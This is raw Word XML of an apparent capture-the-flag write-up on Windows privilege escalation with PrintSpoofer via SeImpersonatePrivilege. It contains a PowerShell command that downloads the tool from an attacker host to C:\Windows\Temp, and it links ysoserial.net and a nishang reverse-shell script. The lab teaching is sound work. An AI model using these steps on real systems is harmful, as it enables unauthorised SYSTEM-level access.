      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SeImpersonatePrivilege (Impersonate a Client after Authentication)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was introduced in Windows 2000 SP4.</w:t>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Users assigned this privilege include:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Members of the local Administrators group</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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local service account</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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Additionally, services started by COM servers through the Service Control Manager and configured to run under a specific account may also have this privilege.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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a user has SeImpersonatePrivilege, they are allowed to execute programs on behalf of another user in order to impersonate a client.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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24100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="70"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Systeminfo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">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l5h701mkkfce" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3860800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="63"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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.jkvtivl9rr3y" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation Using PrintSpoofer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One of the main tools abused in the wild to exploit this privilege is called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PrintSpoofer</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId31">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/itm4n/PrintSpoofer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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tool is relatively new, but the technique it uses is old.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This privilege allows users to create a process with another user’s access token. Therefore, PrintSpoofer exploits this to elevate privileges to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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Upload the tool to the target machine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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59000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="66" name="image21.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image21.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>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30300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="71"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powershell.exe -Command Invoke-WebRequest -Uri http://&lt;IP-VPN&gt;/PrintSpoofer64.exe -OutFile C:\Windows\Temp\PrintSpoofer64.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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06600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="80"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7bh4lrfkaf3p" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2273300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="78" name="image28.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image28.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>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Using PrintSpoofer is simple. It requires two parameters: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-i</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → to provide an interactive session and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-c</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 to specify the command to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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executing this command on the target machine, it checks for SeImpersonatePrivilege and then verifies the named pipe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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successfully completing these steps, it creates a new process with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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Running whoami confirms that we have successfully escalated privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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917700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="61"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59436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teohjprgx4tb" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.e4eyd1z1qsio" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>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simply navigate to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
      <w:pPr>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C:\Users\Administrator\Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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read the final flag =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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52800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="72"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sectPr>
      <w:headerReference r:id="rId38" w:type="default"/>
      <w:headerReference r:id="rId39" w:type="first"/>
      <w:headerReference r:id="rId40" w:type="even"/>
      <w:footerReference r:id="rId41" w:type="default"/>
      <w:footerReference r:id="rId42" w:type="first"/>
      <w:footerReference r:id="rId43"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C">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="16"/>
    <w:bookmarkEnd w:id="16"/>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75" name="image25.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image25.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6D">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6E">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5.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6" name="image14.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image14.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Json</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30.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image30.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5.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3.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.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image" Target="media/image1.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.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0.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://discord.com/channels/705946302105649153/1173705871046475796" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/itm4n/PrintSpoofer" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/pwntester/ysoserial.net" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ysoserial.net/" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1" TargetMode="External"/><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5.jpg"/><Relationship Id="rId2"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30.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yod6OZbW1v6isL2kD82KD5GOFw==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLm56b3gwcHF4OHJpYTIOaC5uejQ3ampvbThwZG4yDmguYTVoZzluam5pNXptMg1oLnVzN29oYzM2bWxuMg5oLnZhZXE4ejM2cjJhcDIOaC40bmpzYWR2MXA3c3IyDmgudGo2NzI2cWJkZWdmMg5oLmw1aDcwMW1ra2ZjZTIOaC5qa3Z0aXZsOXJyM3kyDmguN2JoNGxyZmthZjNwMg5oLnRlb2hqcHJneDR0YjIOaC5lNGV5ZDF6MXFzaW8yDmguMTc1ZjVjczk0ejBvOAByITFFSTh3WEw4d2lDbmdjVDczNkxVa3EtWkpmeXhUN0xC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